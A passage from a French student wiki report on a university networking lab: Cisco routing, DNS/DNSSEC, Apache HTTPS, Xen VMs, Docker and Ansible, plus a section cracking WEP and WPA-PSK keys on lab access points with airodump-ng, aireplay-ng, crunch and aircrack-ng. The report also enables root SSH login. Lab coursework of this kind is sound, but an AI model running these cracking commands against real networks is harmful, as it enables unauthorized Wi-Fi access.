  interface BDI300&lt;br /&gt;
   ip address 10.60.200.1 255.255.255.0&lt;br /&gt;
   no shut&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers Réseau école =====&lt;br /&gt;
 interface GigabitEthernet0/0/0&lt;br /&gt;
  no ip address&lt;br /&gt;
  media-type rj45&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 131 ethernet&lt;br /&gt;
   encapsulation dot1q 131&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain 131&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-1 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/1 , et pour '''&amp;lt;NUMERO&amp;gt;''' ={ 101, 102, 103, 104, 105, 106, 200 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-2 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/2&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/2, et pour '''&amp;lt;NUMERO&amp;gt;''' = { 101, 102, 103, 104, 105, 106, 200, 300 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Configuration Générale=====&lt;br /&gt;
Un routeur proposent différents protocoles de routage &lt;br /&gt;
 '''routerE304(config)'''#router ?                                                                                                                                     &lt;br /&gt;
   bgp       Border Gateway Protocol (BGP)                                                                                                                       &lt;br /&gt;
   eigrp     Enhanced Interior Gateway Routing Protocol (EIGRP)                                                                                                  &lt;br /&gt;
   isis      ISO IS-IS                                                                                                                                           &lt;br /&gt;
   iso-igrp  IGRP for OSI networks                                                                                                                               &lt;br /&gt;
   mobile    Mobile routes                                                                                                                                    &lt;br /&gt;
   odr       On Demand stub Routes                                                                                                                               &lt;br /&gt;
   ospf      Open Shortest Path First (OSPF)                                                                                                                     &lt;br /&gt;
   ospfv3    OSPFv3                                                                                                                                              &lt;br /&gt;
   rip       Routing Information Protocol (RIP)&lt;br /&gt;
&lt;br /&gt;
Nous allons en utiliser quelques uns dans notre implémentation&lt;br /&gt;
======OSPF pour IPv4======&lt;br /&gt;
Open Shortest Path First (OSPF) est un protocol qui permet à des routeurs adjacents dans un même domaine d'administration de s'échanger des informations sur le réseau et sa topologie. Cet échange d'information introduit une notion de voisinage entre routeurs. Les informations échangées (LSBD), permettent aux différents routeurs d'ajuster leurs tables de routage et de choisir les meilleures routes sur la base du coût de transmission. [https://en.wikipedia.org/wiki/Open_Shortest_Path_First Plus]&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.100.1                                 # un id pour le routeur. c'est comme ça qu'il s'identifie auprès de ses voisins                                                                                   &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # on définie les adresses que l'on souhaite diffuser aux voisins                                                                                                             &lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise   # Celles que l'on veut pas diffuser (c'est notre précieux...)                                                                                                         &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés                                                                                                                               &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # délimite le domaine OSPF sur lequel on diffuse pour ne pas surcharger la bases de données de routeurs&lt;br /&gt;
&lt;br /&gt;
======RIP pour IPv6====== &lt;br /&gt;
''Routing Information Protocol'' pour l'échange d'information de routage. Ceci permet de router les paquets entre les routeurs de notre infrastructure avec le minimum de sauts (chemin le plus court).&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  ipv6 router rip tpima5sc             # un identifiant pour le process RIP que nous voulons configurer                                                                                                                               &lt;br /&gt;
   redistribute connected metric 1     # on autorise la diffusion des routes connectées au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute static metric 1        # on autorise la diffusion des routes définies en statique au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute rip 1 metric 1         # on autorise la diffusion des routes sous le protocole rip 1&lt;br /&gt;
&lt;br /&gt;
Vous pouvez faire un diagnostique des routes connues et leur sources une fois que l'interconnexion avec le réseau de l'école est configurée.&lt;br /&gt;
 '''routerE304#'''sh ip route ospf 1          &lt;br /&gt;
 Codes: L - local, C - connected, S - static, '''R - RIP''', M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, '''O - OSPF''', IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route, H - NHRP, l - LISP&lt;br /&gt;
        a - application route&lt;br /&gt;
        + - replicated route, % - next hop override, p - overrides from PfR&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
 O*E2  0.0.0.0/0 [110/1] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
       10.0.0.0/8 is variably subnetted, 85 subnets, 8 masks&lt;br /&gt;
 O E2     10.0.8.0/24 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.11.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.17.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.18.0.0/22 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.0.0/17 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.252.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.254.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.22.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.24.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
  --More--&lt;br /&gt;
======Configuration du spanning tree======&lt;br /&gt;
Pour eviter que l'apparition de boucles dans notre infrastructure nous devons activer le protocole spanning-tree.&lt;br /&gt;
En effet, dans les réseaux commutés Ethernet la présence de boucle génère des tempêtes de diffusion qui paralysent le réseau : tous les liens sont saturés de trames de diffusion qui tournent en rond dans les boucles et les tables d'apprentissage des commutateurs (switch) deviennent instables. [https://fr.wikipedia.org/wiki/Spanning_Tree_Protocol plus] &lt;br /&gt;
&lt;br /&gt;
 spanning-tree mode pvst                # utilisation du protocole de planning tree en mode par Vlan (per vlan spanning tree)                                                                                                                         &lt;br /&gt;
 spanning-tree extend system-id         # utilisation du standard system-id pour l'assignation des identifiants uniques&lt;br /&gt;
&lt;br /&gt;
======unicast IPv6======&lt;br /&gt;
On active unicast IPv6 permettant de router les addresses IPv6 unicast Global (2001:...) que nous avons choisis.&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation du réseau ===&lt;br /&gt;
&lt;br /&gt;
==Services Internet == &lt;br /&gt;
&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la VM une première fois,  il faut utiliser la commande :&lt;br /&gt;
 xl console mycoplasma  --depuis cordouan.&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser les services réseaux il faut être capable de se connecter à la VM en SSH, il faut faire quelques modifications dans le fichier etc/ssh/sshd_config de la VM. Voici la modification : &lt;br /&gt;
  #PermitRootLogin prohibit-password&lt;br /&gt;
par&lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Par la suite, il sera possible d'accéder à la VM directement : &lt;br /&gt;
 ssh root@193.48.57.178&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS ===&lt;br /&gt;
&lt;br /&gt;
Nous avons utiliser le registrar Gandi (http://www.gandi.net) pour réserver notre nom de domaine, nous avons choisi mycoplasma2.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, faire apparaitre dans le fichier /etc/bind/named.conf.options la ligne suivante: &lt;br /&gt;
 dnssec-validation auto;&lt;br /&gt;
&lt;br /&gt;
====Configuration apache ====&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/apache2/sites-available/loadbalance.conf &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:443&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site	&lt;br /&gt;
 	DocumentRoot /var/www/html/&lt;br /&gt;
 	ServerAdmin lina.mejbar@polytech-lille.net&lt;br /&gt;
 	SSLEngine on&lt;br /&gt;
 	SSLCertificateFile /etc/ssl/certs/mycoplasma2.site.crt&lt;br /&gt;
  	SSLCertificateKeyFile /etc/ssl/private/myserver.key &lt;br /&gt;
 	SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
 	SSLVerifyClient None&lt;br /&gt;
 	ErrorLog ${APACHE_LOG_DIR}/lb-error.log&lt;br /&gt;
 	CustomLog ${APACHE_LOG_DIR}/lb-access.log combined&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:80&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site&lt;br /&gt;
 	ProxyPass &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
  	ProxyPassReverse &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
 	Redirect &amp;quot;/&amp;quot; &amp;quot;https://www.mycoplasma2.site&amp;quot;&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin pour enregistrer nos modifications :&lt;br /&gt;
  a2enmod ssl&lt;br /&gt;
  a2ensite mycoplasma2.site.conf&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir sur la photo ci-dessous : nous avons accès à notre site de façon sécurisée.&lt;br /&gt;
[[Fichier:groupe2_https.png|center|500px|Nous avons accès au site sécurisé]]&lt;br /&gt;
&lt;br /&gt;
====Configuration bind9====&lt;br /&gt;
&lt;br /&gt;
BIND veut dire : Berkeley Internet Name Daemon&lt;br /&gt;
Nous avons déjà installer le package [http://www.example.com/ titre du lien ici].&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut créer un fichier de configuration dans le dossier /etc/bind/ avec les informations de notre site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL	604800 &lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
  			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @       IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
Il faut modifier le fichier named.conf.local pour lui donner le nom de notre fichier configuration et de définir les paramètres généraux d'une zone.:&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/mycoplasma2.site&amp;quot;; &lt;br /&gt;
         allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite relancer avec la commande suivante :&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Il faut aussi ajouter dans l'onglet GlueRecords le nom de domaine de notre site, et celui de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
On doit configurer apache2 en mode sécurisé à l’aide d’une clef asymétrique et d’un certificat signé par une autorité de certification. Le CA signe un CSR (Certificate Signing Request), pour ce faire il faut créer les clefs et le CSR en utilisant openssl. &lt;br /&gt;
Il faut ensuite le transformer en un certificat, on va donc configurer apache2 sur le port 443 afin qu'il puisse gérer du HTTPS. &lt;br /&gt;
&lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite renseigner quelques informations : &lt;br /&gt;
&lt;br /&gt;
   Country Name (2 letter code) [AU]: '''France'''&lt;br /&gt;
   State or Province Name (full name) [Some-State]: '''Haut de France'''&lt;br /&gt;
   Locality Name (eg, city) []: '''Lille'''&lt;br /&gt;
   Organization Name (eg, company) [Internet Widgits Pty Ltd]: '''Polytech Lille'''&lt;br /&gt;
   Organizational Unit Name (eg, section) []: IMA5&lt;br /&gt;
   Common Name (e.g. server FQDN or YOUR name) []: '''mycoplasma2.site'''&lt;br /&gt;
   Email Address []:&lt;br /&gt;
   Please enter the following 'extra' attributes to be sent with your certificate request&lt;br /&gt;
   A challenge password []:&lt;br /&gt;
   An optional company name []:&lt;br /&gt;
&lt;br /&gt;
La seule vraie ligne où il ne faut pas se tromper, c'est celle où l'on indique le nom du site (Common Name), si la ligne est fausse Gandi n'acceptera pas votre clef.&lt;br /&gt;
Une fois ces informations renseignées, une clef est générée. &lt;br /&gt;
&lt;br /&gt;
/!\ Il faut la garder précieusement et ne pas la SUPPRIMER des fichiers de la machine virtuelle, dans ce cas il faudra tout recommencer avec un nouveau nom de domaine parce que la clef n'est générable qu'une seule fois.&lt;br /&gt;
Il faut maintenant copier le contenu de ce fichier avec le &amp;quot;BEGIN CERTIFICATE REQUEST-----&amp;quot; et le &amp;quot;END CERTIFICATE REQUEST-----&amp;quot; sur le site de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
 root@mycoplasma:/etc/bind# vim named.conf&lt;br /&gt;
&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.options&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.local&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.default-zones&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Pour générer les clefs dans un même dossier, il faut le créer voici le chemin pour notre groupe :&lt;br /&gt;
 root@mycoplasma:/etc/bind/mycoplasma2.site.dnssec# &lt;br /&gt;
&lt;br /&gt;
Pour générer les clés KSK on lance la commande suivante :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE mycoplasma2.site&lt;br /&gt;
Pour ZSK :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1048 -n ZONE mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
On peut maintenant rajouter nos clefs dans le fichier mycoplasma2.site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 $TTL	604800&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-ksk.key'''&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-zsk.key'''&lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
 			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @      IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
On signe les enregistrements de la zone en exécutant la commande suivante :&lt;br /&gt;
 dnssec-signzone -o mycoplasma2.site -k mycoplasma2.site-ksk ../mycoplasma2.site mycoplasma2.site-zsk&lt;br /&gt;
&lt;br /&gt;
Dernière étape, il fait ajouter le chemin du fichier pour utiliser le fichier de zone signé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        '''file &amp;quot;/etc/bind/mycoplasma2.site.signed&amp;quot;;''' &lt;br /&gt;
        allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous vérifions sous dnsviz.net le bon fonctionnement du DNSSEC :&lt;br /&gt;
[[Fichier:groupe2_dnsViz.png|center|500px]]&lt;br /&gt;
&lt;br /&gt;
===Serveur Freeradius===&lt;br /&gt;
&lt;br /&gt;
==Ferme de serveurs Web==&lt;br /&gt;
Il faut implanter une architecture d’équilibrage de charge pour un site Web.&lt;br /&gt;
&lt;br /&gt;
===Architecture générale de la ferme===&lt;br /&gt;
Pour ce faire, chaque binôme a créé une nouvelle machine virtuelle Xen qui hébergera un serveur Web. Ainsi chaque binôme pourra disposer de plusieurs serveurs Web proposant exactement le même site sur plusieurs machines différentes. Ces serveurs Web ne seront pas directement disponibles d’Internet mais au travers d’un équilibreur de charge tournant sur leur machine virtuelle principale.&lt;br /&gt;
&lt;br /&gt;
'''Nom de la Machine Virtuelle ''' : private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
'''Commandes''': &lt;br /&gt;
La MV doit être créée sur Cordouan.&lt;br /&gt;
 root@zabethX:~# ssh root@cordouan.insecserv.deule.net &lt;br /&gt;
&lt;br /&gt;
 root@cordouan:~# xen-create-image --hostname=private-mycoplasma --ip=ip 192.168.0.2 --dir=/usr/local/xen&lt;br /&gt;
 root@cordouan:~# xl create private-mlycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
Il faut suivre les logs de la création de la machine virtuelle avec le fichier suivant:&lt;br /&gt;
 root@cordouan:~# tail -f /var/log/xen-tools/private-mycoplasma.log&lt;br /&gt;
&lt;br /&gt;
Pour accèder une première fois à la machine virtuelle, il faut utiliser cette commande car SSH n'est pas encore autorisé.&lt;br /&gt;
 root@cordouan:~# xl console private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
Pour l'activer voici les modifications, il faut remplacer la ligne suivante de ce fichier /etc/ssh/sshd_config :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot;  '''par'''  &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
&lt;br /&gt;
Il est possible de se connecter en SSH  et de paramétrer le proxy : &lt;br /&gt;
 root@cordouan:~# ssh root@192.168.0.2&lt;br /&gt;
 root@private-mycoplasma:~# export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# export https_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# xen-create-image --hostname=herpesgenital --dhcp --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
Il faut modifier l'adresse mac, pour avoir une adresse mac unique pour chaque binôme, et il faut configurer le bridge.&lt;br /&gt;
 vif = [ 'mac=00:16:3E:2B:FF:6A,bridge=IMA5sc-priv' ]&lt;br /&gt;
&lt;br /&gt;
Voici notre nouvelle structure :&lt;br /&gt;
[[Fichier:G2_Structure.png|center|800px]]&lt;br /&gt;
&lt;br /&gt;
Pour y arriver, il faut modifier les fichiers /etc/network/interfaces des deux machines virtuelles avec les adresses, Gateway, et netmask marque sur la photo ci-dessus. Et valider les modifications avec les commandes habituelles : ifdown eth'''i''' et ifup eth'''i'''&lt;br /&gt;
&lt;br /&gt;
=== Mascarade ===&lt;br /&gt;
&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -s 192.168.0.0/24&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -d 192.168.0.0/24&lt;br /&gt;
 iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.0.0/24&lt;br /&gt;
 echo 1 &amp;gt; /proc/sys/net/ipv4/ip_forward&lt;br /&gt;
 apt install iptables-persistent&lt;br /&gt;
 &lt;br /&gt;
Il faut ensuite décommenter &lt;br /&gt;
 net.ipv4.ipforward=1&lt;br /&gt;
&lt;br /&gt;
=== Création du conteneur ===&lt;br /&gt;
&lt;br /&gt;
Il est important dans cette partie que tous les binômes se mettent d'accord pour installer le même package de docker &lt;br /&gt;
 root@mycoplasma:~/#  ansible-galaxy install geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
Voici le fichier DockerFile que l'on a codé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~/test# cat docker/Dockerfile &lt;br /&gt;
&lt;br /&gt;
 FROM centos:latest&lt;br /&gt;
 MAINTAINER NewstarCorporation&lt;br /&gt;
 RUN yum -y install httpd&lt;br /&gt;
 COPY mycoplasma/index.html /var/wwww/html/index.html&lt;br /&gt;
 CMD [&amp;quot;/usr/sbin/httpd&amp;quot;, &amp;quot;-D&amp;quot;, &amp;quot;FOREGROUND&amp;quot;]&lt;br /&gt;
 EXPOSE 80&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On a eu le problème suivant lorsqu'on souhaite visiter notre site : &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_mycoplasmaSite.png|center|900px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker ps =&amp;gt; Notre docker &amp;quot;mycoplasma&amp;quot;  tourne donc  ce n'est pas le problème.&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker exec -it &amp;lt;CONTAINER ID&amp;gt; /bash/bin &lt;br /&gt;
 root@&amp;lt;CONTAINER ID&amp;gt;:~/# ls /var/www/html &lt;br /&gt;
&lt;br /&gt;
Avec cette dernière commande, on peut voir que le fichier index.html ne s'est pas copié malgré les commandes du Dockerfile. Pourtant le Docker build s'est exécuté sans afficher d'erreurs. On peut voir les logs pour avoir une idée : &lt;br /&gt;
  root@corduan:~/# docker logs &amp;lt;CONTAINER ID&amp;gt;&lt;br /&gt;
Voici le résultat : &lt;br /&gt;
 AH00558: httpd: Could not reliably determine the server's fully qualified domain name, using 172.17.0.5. Set the 'ServerName' directive globally to suppress this message&lt;br /&gt;
&lt;br /&gt;
=== Configuration des serveurs internes ===&lt;br /&gt;
&lt;br /&gt;
===Equilibreur de charge===&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
Pour scanner l'environnement Wi-Fi, on utilise l'outil airodump-ng. On remarque qu'il y a deux types de wifi, les cracottes avec un c et les kracottes avec un k.&lt;br /&gt;
On lance l'interface en mode moniteur : &lt;br /&gt;
 airmon-ng start  wlan0mon&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On a choisi de casser la clé WEP de la cracotte5 sur le channel 2, on enregistre les paquets dans webPack.&lt;br /&gt;
 airodump-ng -c 2 –-bssid 04:DA:D2:9C:5O:5A -w wepPack wlan0mon&lt;br /&gt;
&lt;br /&gt;
La commande suivante permet de se faire passer pour un client afin de générer de l'activité sur le réseau.&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a 04:DA:D2:9C:5O:5A wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise les paquets enregistrés pour réaliser le cassage:&lt;br /&gt;
 aircrack-ng wepDico*.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:g2_wep.png|center|600 px]]&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Il faut lancer la commande ip a : récupérer le nom de l'interface wifi : &amp;quot;&amp;quot;wlx40a5ef0f6518&amp;quot;&amp;quot;. Il faut le lancer avec la commande :&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite écouter le réseau, on récupère alors le channel(2), le nom du wifi, le BSSID (04:DA:D2:9C:5O:5A) avec la commande suivante:&lt;br /&gt;
 airodump-ng --encrypt wpa wlan0mon&lt;br /&gt;
Nous avons choisi de cracker &amp;quot;kracote03&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon --bssid 04:DA:D2:9C:5O:5A --ch 2 -w capture&lt;br /&gt;
&lt;br /&gt;
Il faut l'arreter une fois qu'on obtient un handshake &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_WPA.png| 800 px|center]]&lt;br /&gt;
&lt;br /&gt;
Pour générer un dictionnaire, on a besoin de la commande suivante : &lt;br /&gt;
 sudo apt-get update&lt;br /&gt;
 sudo apt-get install crunch&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 -o dico.txt 0123456789&lt;br /&gt;
&lt;br /&gt;
* 8 8 : donne des codes de 8 caractères au minimum et au maximum&lt;br /&gt;
&lt;br /&gt;
On lance cette commande : &lt;br /&gt;
 airodump-ng -c 2 --bssid 04:DA:D2:9C:5O:5A -w ./home/pifou/crack wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Voici une capture de la commande :&lt;br /&gt;
 aircrack crack/capture.cap -w dico.txt &lt;br /&gt;
[[Fichier:G2_catch.png|center]]&lt;br /&gt;
&lt;br /&gt;
On remarque ce la photo ci dessus que la commande a pris 21 min et 42 sec.&lt;br /&gt;
&lt;br /&gt;
== Partie  ASR ==&lt;br /&gt;
&lt;br /&gt;
=== Ansible ===&lt;br /&gt;
&lt;br /&gt;
Ansible permet l'automatisation par connexion sans mot de passe.&lt;br /&gt;
Il faut d'abord générer une clef asymétrique :&lt;br /&gt;
 ssh-keygen -t rsa&lt;br /&gt;
&lt;br /&gt;
Installation de la clef publique sur les machines virtuelles 192.168.0.1 à 192.168.0.6  :&lt;br /&gt;
 cat .ssh/id_rsa.pub | ssh 192.168.0.1 &amp;quot;cat &amp;gt;&amp;gt; /root/.ssh/authorized_keys2&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Il faut  installer Ansible : &lt;br /&gt;
 apt install ansible&lt;br /&gt;
====Hosts====&lt;br /&gt;
Ensuite il faut rédiger l'inventaire ( /etc/ansible/hosts ) c'est un fichier yaml, il faut très attention à la syntaxe. Ce fichier regroupe le parc informatique :&lt;br /&gt;
&lt;br /&gt;
 all:&lt;br /&gt;
 hosts:&lt;br /&gt;
  interne:&lt;br /&gt;
    ansible_host: 192.168.0.2&lt;br /&gt;
 children:&lt;br /&gt;
  serveur-web:&lt;br /&gt;
   hosts:&lt;br /&gt;
    192.168.0.[1:6]&lt;br /&gt;
&lt;br /&gt;
====Playbooks====&lt;br /&gt;
&lt;br /&gt;
Maintenant qu'on a défini toutes les machines dans notre parc et qu'on peut se connecter automatique, on peut exécuter une commande à distance sur tout le parc à l'aide d'Ansible.&lt;br /&gt;
Un &amp;quot;playbook&amp;quot; c'est une liste des tâches à effectuer sur ces machines.&lt;/div&gt;</summary>
		<author><name>Aaitmouh</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52015</id>
		<title>TP sysres IMA5sc 2019/2020 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52015"/>
				<updated>2020-01-05T15:11:27Z</updated>
		
		<summary type="html">&lt;p&gt;Aaitmouh : /* Création des Réseaux virtuels */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
